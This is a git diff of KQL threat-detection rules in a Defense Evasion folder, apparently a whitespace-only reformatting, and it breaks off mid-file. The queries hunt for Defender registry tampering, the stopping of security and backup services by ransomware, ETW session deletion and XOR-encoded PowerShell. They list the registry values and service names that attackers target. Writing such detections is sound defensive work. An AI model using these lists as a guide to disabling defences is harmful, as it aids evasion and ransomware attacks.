a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql index 6a7a594d..72721a75 100644 --- a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql +++ b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Volume Shadow Copy Vssapi.dll Load -// Author: frack113 -// Date: 2022-10-31 -// Level: high -// Description: Detects the image load of VSS DLL by uncommon executables -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.impact, attack.t1490 - -DeviceImageLoadEvents +// Title: Suspicious Volume Shadow Copy Vssapi.dll Load +// Author: frack113 +// Date: 2022-10-31 +// Level: high +// Description: Detects the image load of VSS DLL by uncommon executables +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490 + +DeviceImageLoadEvents | where FolderPath endswith "\\vssapi.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) and (not(((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql b/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql index aed0ddc8..9d5b0e1c 100644 --- a/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql +++ b/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Vsls-Agent Command With AgentExtensionPath Load -// Author: bohops -// Date: 2022-10-30 -// Level: medium -// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - False positives depend on custom use of vsls-agent.exe - -DeviceProcessEvents +// Title: Suspicious Vsls-Agent Command With AgentExtensionPath Load +// Author: bohops +// Date: 2022-10-30 +// Level: medium +// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False positives depend on custom use of vsls-agent.exe + +DeviceProcessEvents | where (ProcessCommandLine contains "--agentExtensionPath" and FolderPath endswith "\\vsls-agent.exe") and (not(ProcessCommandLine contains "Microsoft.VisualStudio.LiveShare.Agent.")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql index 807e3a4e..35bbfec1 100644 --- a/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE -// Author: frack113 -// Date: 2022-02-13 -// Level: medium -// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" or ProcessCommandLine contains "SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths") and (ProcessCommandLine contains "ADD " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_DWORD " and ProcessCommandLine contains "/v " and ProcessCommandLine contains "/d " and ProcessCommandLine contains "0") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql index 534e2f08..dfd7e2e0 100644 --- a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE -// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-03-22 -// Level: high -// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Rare legitimate use by administrators to test software (should always be investigated) - -DeviceProcessEvents +// Title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-03-22 +// Level: high +// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Rare legitimate use by administrators to test software (should always be investigated) + +DeviceProcessEvents | where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\")) and (((ProcessCommandLine contains "DisallowExploitProtectionOverride" or ProcessCommandLine contains "EnableControlledFolderAccess" or ProcessCommandLine contains "MpEnablePus" or ProcessCommandLine contains "PUAProtection" or ProcessCommandLine contains "SpynetReporting" or ProcessCommandLine contains "SubmitSamplesConsent" or ProcessCommandLine contains "TamperProtection") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 0")) or ((ProcessCommandLine contains "DisableAccess" or ProcessCommandLine contains "DisableAntiSpyware" or ProcessCommandLine contains "DisableAntiSpywareRealtimeProtection" or ProcessCommandLine contains "DisableAntiVirus" or ProcessCommandLine contains "DisableAntiVirusSignatures" or ProcessCommandLine contains "DisableArchiveScanning" or ProcessCommandLine contains "DisableBehaviorMonitoring" or ProcessCommandLine contains "DisableBlockAtFirstSeen" or ProcessCommandLine contains "DisableCloudProtection" or ProcessCommandLine contains "DisableConfig" or ProcessCommandLine contains "DisableEnhancedNotifications" or ProcessCommandLine contains "DisableIntrusionPreventionSystem" or ProcessCommandLine contains "DisableIOAVProtection" or ProcessCommandLine contains "DisableNetworkProtection" or ProcessCommandLine contains "DisableOnAccessProtection" or ProcessCommandLine contains "DisablePrivacyMode" or ProcessCommandLine contains "DisableRealtimeMonitoring" or ProcessCommandLine contains "DisableRoutinelyTakingAction" or ProcessCommandLine contains "DisableScanOnRealtimeEnable" or ProcessCommandLine contains "DisableScriptScanning" or ProcessCommandLine contains "DisableSecurityCenter" or ProcessCommandLine contains "Notification_Suppress" or ProcessCommandLine contains "SignatureDisableUpdateOnStartupWithoutEngine") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 1"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql index b3fcbcbd..9320a3fa 100644 --- a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql +++ b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Windows Service Tampering -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems) -// Date: 2022-09-01 -// Level: high -// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.impact, attack.t1489, attack.t1562.001 -// False Positives: -// - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry - -DeviceProcessEvents +// Title: Suspicious Windows Service Tampering +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1489, attack.t1562.001 +// False Positives: +// - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry + +DeviceProcessEvents | where (ProcessCommandLine contains "143Svc" or ProcessCommandLine contains "Acronis VSS Provider" or ProcessCommandLine contains "AcronisAgent" or ProcessCommandLine contains "AcrSch2Svc" or ProcessCommandLine contains "AdobeARMservice" or ProcessCommandLine contains "AHS Service" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "Apache4" or ProcessCommandLine contains "ARSM" or ProcessCommandLine contains "aswBcc" or ProcessCommandLine contains "AteraAgent" or ProcessCommandLine contains "Avast Business Console Client Antivirus Service" or ProcessCommandLine contains "avast! Antivirus" or ProcessCommandLine contains "AVG Antivirus" or ProcessCommandLine contains "avgAdminClient" or ProcessCommandLine contains "AvgAdminServer" or ProcessCommandLine contains "AVP1" or ProcessCommandLine contains "BackupExec" or ProcessCommandLine contains "bedbg" or ProcessCommandLine contains "BITS" or ProcessCommandLine contains "BrokerInfrastructure" or ProcessCommandLine contains "CASLicenceServer" or ProcessCommandLine contains "CASWebServer" or ProcessCommandLine contains "Client Agent 7.60" or ProcessCommandLine contains "Core Browsing Protection" or ProcessCommandLine contains "Core Mail Protection" or ProcessCommandLine contains "Core Scanning Server" or ProcessCommandLine contains "DCAgent" or ProcessCommandLine contains "dwmrcs" or ProcessCommandLine contains "EhttpSr" or ProcessCommandLine contains "ekrn" or ProcessCommandLine contains "Enterprise Client Service" or ProcessCommandLine contains "epag" or ProcessCommandLine contains "EPIntegrationService" or ProcessCommandLine contains "EPProtectedService" or ProcessCommandLine contains "EPRedline" or ProcessCommandLine contains "EPSecurityService" or ProcessCommandLine contains "EPUpdateService" or ProcessCommandLine contains "EraserSvc11710" or ProcessCommandLine contains "EsgShKernel" or ProcessCommandLine contains "ESHASRV" or ProcessCommandLine contains "FA_Scheduler" or ProcessCommandLine contains "FirebirdGuardianDefaultInstance" or ProcessCommandLine contains "FirebirdServerDefaultInstance" or ProcessCommandLine contains "FontCache3.0.0.0" or ProcessCommandLine contains "HealthTLService" or ProcessCommandLine contains "hmpalertsvc" or ProcessCommandLine contains "HMS" or ProcessCommandLine contains "HostControllerService" or ProcessCommandLine contains "hvdsvc" or ProcessCommandLine contains "IAStorDataMgrSvc" or ProcessCommandLine contains "IBMHPS" or ProcessCommandLine contains "ibmspsvc" or ProcessCommandLine contains "IISAdmin" or ProcessCommandLine contains "IMANSVC" or ProcessCommandLine contains "IMAP4Svc" or ProcessCommandLine contains "instance2" or ProcessCommandLine contains "KAVFS" or ProcessCommandLine contains "KAVFSGT" or ProcessCommandLine contains "kavfsslp" or ProcessCommandLine contains "KeyIso" or ProcessCommandLine contains "klbackupdisk" or ProcessCommandLine contains "klbackupflt" or ProcessCommandLine contains "klflt" or ProcessCommandLine contains "klhk" or ProcessCommandLine contains "KLIF" or ProcessCommandLine contains "klim6" or ProcessCommandLine contains "klkbdflt" or ProcessCommandLine contains "klmouflt" or ProcessCommandLine contains "klnagent" or ProcessCommandLine contains "klpd" or ProcessCommandLine contains "kltap" or ProcessCommandLine contains "KSDE1.0.0" or ProcessCommandLine contains "LogProcessorService" or ProcessCommandLine contains "M8EndpointAgent" or ProcessCommandLine contains "macmnsvc" or ProcessCommandLine contains "masvc" or ProcessCommandLine contains "MBAMService" or ProcessCommandLine contains "MBCloudEA" or ProcessCommandLine contains "MBEndpointAgent" or ProcessCommandLine contains "McAfeeDLPAgentService" or ProcessCommandLine contains "McAfeeEngineService" or ProcessCommandLine contains "MCAFEEEVENTPARSERSRV" or ProcessCommandLine contains "McAfeeFramework" or ProcessCommandLine contains "MCAFEETOMCATSRV530" or ProcessCommandLine contains "McShield" or ProcessCommandLine contains "McTaskManager" or ProcessCommandLine contains "mfefire" or ProcessCommandLine contains "mfemms" or ProcessCommandLine contains "mfevto" or ProcessCommandLine contains "mfevtp" or ProcessCommandLine contains "mfewc" or ProcessCommandLine contains "MMS" or ProcessCommandLine contains "mozyprobackup" or ProcessCommandLine contains "mpssvc" or ProcessCommandLine contains "MSComplianceAudit" or ProcessCommandLine contains "MSDTC" or ProcessCommandLine contains "MsDtsServer" or ProcessCommandLine contains "MSExchange" or ProcessCommandLine contains "msftesq1SPROO" or ProcessCommandLine contains "msftesql$PROD" or ProcessCommandLine contains "msftesql$SQLEXPRESS" or ProcessCommandLine contains "MSOLAP$SQL_2008" or ProcessCommandLine contains "MSOLAP$SYSTEM_BGC" or ProcessCommandLine contains "MSOLAP$TPS" or ProcessCommandLine contains "MSOLAP$TPSAMA" or ProcessCommandLine contains "MSOLAPSTPS" or ProcessCommandLine contains "MSOLAPSTPSAMA" or ProcessCommandLine contains "mssecflt" or ProcessCommandLine contains "MSSQ!I.SPROFXENGAGEMEHT" or ProcessCommandLine contains "MSSQ0SHAREPOINT" or ProcessCommandLine contains "MSSQ0SOPHOS" or ProcessCommandLine contains "MSSQL" or ProcessCommandLine contains "MSSQLFDLauncher$" or ProcessCommandLine contains "MySQL" or ProcessCommandLine contains "NanoServiceMain" or ProcessCommandLine contains "NetMsmqActivator" or ProcessCommandLine contains "NetPipeActivator" or ProcessCommandLine contains "netprofm" or ProcessCommandLine contains "NetTcpActivator" or ProcessCommandLine contains "NetTcpPortSharing" or ProcessCommandLine contains "ntrtscan" or ProcessCommandLine contains "nvspwmi" or ProcessCommandLine contains "ofcservice" or ProcessCommandLine contains "Online Protection System" or ProcessCommandLine contains "OracleClientCache80" or ProcessCommandLine contains "OracleDBConsole" or ProcessCommandLine contains "OracleMTSRecoveryService" or ProcessCommandLine contains "OracleOraDb11g_home1" or ProcessCommandLine contains "OracleService" or ProcessCommandLine contains "OracleVssWriter" or ProcessCommandLine contains "osppsvc" or ProcessCommandLine contains "PandaAetherAgent" or ProcessCommandLine contains "PccNTUpd" or ProcessCommandLine contains "PDVFSService" or ProcessCommandLine contains "POP3Svc" or ProcessCommandLine contains "postgresql-x64-9.4" or ProcessCommandLine contains "POVFSService" or ProcessCommandLine contains "PSUAService" or ProcessCommandLine contains "Quick Update Service" or ProcessCommandLine contains "RepairService" or ProcessCommandLine contains "ReportServer" or ProcessCommandLine contains "ReportServer$" or ProcessCommandLine contains "RESvc" or ProcessCommandLine contains "RpcEptMapper" or ProcessCommandLine contains "sacsvr" or ProcessCommandLine contains "SamSs" or ProcessCommandLine contains "SAVAdminService" or ProcessCommandLine contains "SAVService" or ProcessCommandLine contains "ScSecSvc" or ProcessCommandLine contains "SDRSVC" or ProcessCommandLine contains "SearchExchangeTracing" or ProcessCommandLine contains "sense" or ProcessCommandLine contains "SentinelAgent" or ProcessCommandLine contains "SentinelHelperService" or ProcessCommandLine contains "SepMasterService" or ProcessCommandLine contains "ShMonitor" or ProcessCommandLine contains "Smcinst" or ProcessCommandLine contains "SmcService" or ProcessCommandLine contains "SMTPSvc" or ProcessCommandLine contains "SNAC" or ProcessCommandLine contains "SntpService" or ProcessCommandLine contains "Sophos" or ProcessCommandLine contains "SQ1SafeOLRService" or ProcessCommandLine contains "SQL Backups" or ProcessCommandLine contains "SQL Server" or ProcessCommandLine contains "SQLAgent" or ProcessCommandLine contains "SQLANYs_Sage_FAS_Fixed_Assets" or ProcessCommandLine contains "SQLBrowser" or ProcessCommandLine contains "SQLsafe" or ProcessCommandLine contains "SQLSERVERAGENT" or ProcessCommandLine contains "SQLTELEMETRY" or ProcessCommandLine contains "SQLWriter" or ProcessCommandLine contains "SSISTELEMETRY130" or ProcessCommandLine contains "SstpSvc" or ProcessCommandLine contains "storflt" or ProcessCommandLine contains "svcGenericHost" or ProcessCommandLine contains "swc_service" or ProcessCommandLine contains "swi_filter" or ProcessCommandLine contains "swi_service" or ProcessCommandLine contains "swi_update" or ProcessCommandLine contains "Symantec" or ProcessCommandLine contains "sysmon" or ProcessCommandLine contains "TeamViewer" or ProcessCommandLine contains "Telemetryserver" or ProcessCommandLine contains "ThreatLockerService" or ProcessCommandLine contains "TMBMServer" or ProcessCommandLine contains "TmCCSF" or ProcessCommandLine contains "TmFilter" or ProcessCommandLine contains "TMiCRCScanService" or ProcessCommandLine contains "tmlisten" or ProcessCommandLine contains "TMLWCSService" or ProcessCommandLine contains "TmPfw" or ProcessCommandLine contains "TmPreFilter" or ProcessCommandLine contains "TmProxy" or ProcessCommandLine contains "TMSmartRelayService" or ProcessCommandLine contains "tmusa" or ProcessCommandLine contains "Tomcat" or ProcessCommandLine contains "Trend Micro Deep Security Manager" or ProcessCommandLine contains "TrueKey" or ProcessCommandLine contains "UFNet" or ProcessCommandLine contains "UI0Detect" or ProcessCommandLine contains "UniFi" or ProcessCommandLine contains "UTODetect" or ProcessCommandLine contains "vds" or ProcessCommandLine contains "Veeam" or ProcessCommandLine contains "VeeamDeploySvc" or ProcessCommandLine contains "Veritas System Recovery" or ProcessCommandLine contains "vmic" or ProcessCommandLine contains "VMTools" or ProcessCommandLine contains "vmvss" or ProcessCommandLine contains "VSApiNt" or ProcessCommandLine contains "VSS" or ProcessCommandLine contains "W3Svc" or ProcessCommandLine contains "wbengine" or ProcessCommandLine contains "WdNisSvc" or ProcessCommandLine contains "WeanClOudSve" or ProcessCommandLine contains "Weems JY" or ProcessCommandLine contains "WinDefend" or ProcessCommandLine contains "wmms" or ProcessCommandLine contains "wozyprobackup" or ProcessCommandLine contains "WPFFontCache_v0400" or ProcessCommandLine contains "WRSVC" or ProcessCommandLine contains "wsbexchange" or ProcessCommandLine contains "WSearch" or ProcessCommandLine contains "wscsvc" or ProcessCommandLine contains "Zoolz 2 Service") and ((ProcessCommandLine contains " delete " or ProcessCommandLine contains ".delete()" or ProcessCommandLine contains " pause " or ProcessCommandLine contains " stop " or ProcessCommandLine contains "Stop-Service " or ProcessCommandLine contains "Remove-Service ") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "start=disabled")) and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe", "PowerShell_ISE.EXE", "PowerShell.EXE", "psservice.exe", "pwsh.dll", "sc.exe", "wmic.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\PowerShell_ISE.EXE" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\wmic.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql index 3ca2bf94..b43493dc 100644 --- a/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2021-02-11 -// Level: high -// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001, attack.t1070.001 -// False Positives: -// - Legitimate deactivation by administrative staff -// - Installer tools that disable services, e.g. before log collection agent installation - -DeviceProcessEvents +// Title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-11 +// Level: high +// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001, attack.t1070.001 +// False Positives: +// - Legitimate deactivation by administrative staff +// - Installer tools that disable services, e.g. before log collection agent installation + +DeviceProcessEvents | where (ProcessCommandLine contains "stop " or ProcessCommandLine contains "delete ") and (FolderPath endswith "\\logman.exe" or ProcessVersionInfoOriginalFileName =~ "Logman.exe") and (ProcessCommandLine contains "Circular Kernel Context Logger" or ProcessCommandLine contains "EventLog-" or ProcessCommandLine contains "SYSMON TRACE" or ProcessCommandLine contains "SysmonDnsEtwSession") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql index cdc0a124..75bbb803 100644 --- a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql +++ b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Windows Update Agent Empty Cmdline -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-26 -// Level: high -// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Suspicious Windows Update Agent Empty Cmdline +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-26 +// Level: high +// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where (ProcessCommandLine endswith "Wuauclt" or ProcessCommandLine endswith "Wuauclt.exe") and (FolderPath endswith "\\Wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "Wuauclt.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql index 41be0cce..6cffef56 100644 --- a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql +++ b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Wordpad Outbound Connections -// Author: X__Junior (Nextron Systems) -// Date: 2023-07-12 -// Level: medium -// Description: Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. -// This might indicate potential process injection activity from a beacon or similar mechanisms. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.command-and-control -// False Positives: -// - Other ports can be used, apply additional filters accordingly - -DeviceNetworkEvents +// Title: Suspicious Wordpad Outbound Connections +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-12 +// Level: medium +// Description: Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. +// This might indicate potential process injection activity from a beacon or similar mechanisms. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control +// False Positives: +// - Other ports can be used, apply additional filters accordingly + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\wordpad.exe" and (not((RemotePort in~ ("80", "139", "443", "445", "465", "587", "993", "995")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql b/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql index 44ca426a..7981e74c 100644 --- a/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql +++ b/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Workstation Locking via Rundll32 -// Author: frack113 -// Date: 2022-06-04 -// Level: medium -// Description: Detects a suspicious call to the user32.dll function that locks the user workstation -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option - -DeviceProcessEvents +// Title: Suspicious Workstation Locking via Rundll32 +// Author: frack113 +// Date: 2022-06-04 +// Level: medium +// Description: Detects a suspicious call to the user32.dll function that locks the user workstation +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option + +DeviceProcessEvents | where ProcessCommandLine contains "user32.dll," and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\cmd.exe" and ProcessCommandLine contains "LockWorkStation" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql b/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql index 5d55774c..f4de1526 100644 --- a/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql +++ b/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql @@ -1,12 +1,12 @@ -// Title: Suspicious X509Enrollment - Process Creation -// Author: frack113 -// Date: 2022-12-23 -// Level: medium -// Description: Detect use of X509Enrollment -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1553.004 -// False Positives: -// - Legitimate administrative script - -DeviceProcessEvents +// Title: Suspicious X509Enrollment - Process Creation +// Author: frack113 +// Date: 2022-12-23 +// Level: medium +// Description: Detect use of X509Enrollment +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Legitimate administrative script + +DeviceProcessEvents | where ProcessCommandLine contains "X509Enrollment.CBinaryConverter" or ProcessCommandLine contains "884e2002-217d-11da-b2a4-000e7bbb2b09" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql b/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql index 2b07c6b5..c421d7f0 100644 --- a/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql +++ b/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql @@ -1,10 +1,10 @@ -// Title: Suspicious XOR Encoded PowerShell Command -// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali -// Date: 2018-09-05 -// Level: medium -// Description: Detects presence of a potentially xor encoded powershell command -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027 - -DeviceProcessEvents +// Title: Suspicious XOR Encoded PowerShell Command +// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali +// Date: 2018-09-05 +// Level: medium +// Description: Detects presence of a potentially xor encoded powershell command +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027 + +DeviceProcessEvents | where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql b/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql index d379c122..40ece80f 100644 --- a/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql +++ b/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql @@ -1,12 +1,12 @@ -// Title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code -// Author: frack113 -// Date: 2021-07-12 -// Level: medium -// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - App-V clients - -DeviceProcessEvents +// Title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code +// Author: frack113 +// Date: 2021-07-12 +// Level: medium +// Description: Executes arbitrary 